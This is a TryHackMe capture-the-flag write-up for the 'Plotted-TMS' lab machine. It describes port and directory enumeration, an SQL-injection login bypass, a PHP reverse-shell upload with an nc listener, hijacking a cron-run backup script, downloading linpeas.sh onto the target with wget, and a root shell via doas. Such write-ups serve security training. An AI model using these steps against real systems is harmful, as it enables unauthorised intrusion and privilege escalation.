Plotted-TMS – TryHackMe CTF writeup

by

Description

Everything here is plotted!

https://tryhackme.com/room/plottedtms

Happy Hunting!

Tip: Enumeration is key!

Port scanning

nmap -p- -sS -T4 -A 10.81.183.25

Main website

Both sites – the one on port 80 and another one on 445 are presenting the default Apache Page.

Directories enumeration

feroxbuster -u http://10.81.183.25:80 -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
feroxbuster -u http://10.81.183.25:445 -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt

The most interesting file was id_rsa, present in the directory listing on port 80. But it was just a tip encoded in base64… The same with other juicy files like /passwd and /shadow 

On port 445 we have /management website:

Login page http://10.81.183.25:445/management/admin/login.php

Bypassing authorization using SQL Injection

Login request is a POST to http://10.81.183.25:445/management/classes/Login.php?f=login with plaintext body: username=admin&password=admin

I used Burp Intruder with payloads from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Intruder/Auth_Bypass.txt to try bypass authorization.

Unrestricted File Upload → Remote Code Execution

I started listening on my machine using nc -nlvp 1234.
Next, I uploaded php-reverse-shell.php as an avatar file and accessed the server as the www-data user.

Privilege escalation to plot_admin

There is a cron job executed every minute as plot_admin.
It is running script /var/www/scripts/backup.sh
I don’t have write permission to backup.sh file, but this file is copying everything from /var/www/html/management to /home/plot_admin/tms_backup and it gives it 770 permissions.
I can’t write to the  backup.sh but I can write to this directory.

I started listening on my kali linux machine using nc -nlvp 1235
Next, I created a script and replaced backup.sh with my script:

Exploiting doas with SUID bit set 

I downloaded linpeas.sh script to target machine using wget:
I started python server on my kali:
python3 -m http.server
and on target machine:
wget http://my-machine-ip:8000/linpeas.sh
It found doas with SUID bit set. doas is a privilege escalation utility similar to sudo that allows users to execute commands as root. When doas is misconfigured or has the SUID bit set, an attacker can abuse overly permissive rules to execute arbitrary commands as root. This results in full privilege escalation.

I used it to read the flag in the root folder, but it can be used like:
doas -u root /bin/sh